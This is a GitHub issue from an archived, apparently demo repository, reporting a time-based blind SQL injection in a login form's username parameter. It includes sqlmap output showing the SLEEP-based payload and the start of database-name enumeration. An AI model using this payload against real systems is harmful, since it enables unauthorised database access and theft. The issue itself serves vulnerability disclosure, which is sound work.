This repository has been archived by the owner on Jan 27, 2022. It is now read-only.
Blind SQLi on username parameter #3
Comments
|
OK thanks for notifying.. I will look into this later. Since this is a not production ready app you can expect such problems :) |
Sign up for free
to subscribe to this conversation on GitHub.
Already have an account?
Sign in.
sqlmap got a 302 redirect to 'http://192.168.1.64:80/login.php'. Do you want to follow? [Y/n] Y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
Parameter: username (POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=admin' AND (SELECT * FROM (SELECT(SLEEP(5)))KkoL)-- eriu&password=admin
[10:33:12] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.29
back-end DBMS: MySQL >= 5.0.12
[10:33:12] [INFO] fetching database names
[10:33:12] [INFO] fetching number of databases
[10:33:12] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
[10:33:23] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[10:33:43] [INFO] adjusting time delay to 1 second due to good response times
6
[10:33:43] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
information_schema
[10:35:44] [INFO] retrieved: food
The text was updated successfully, but these errors were encountered: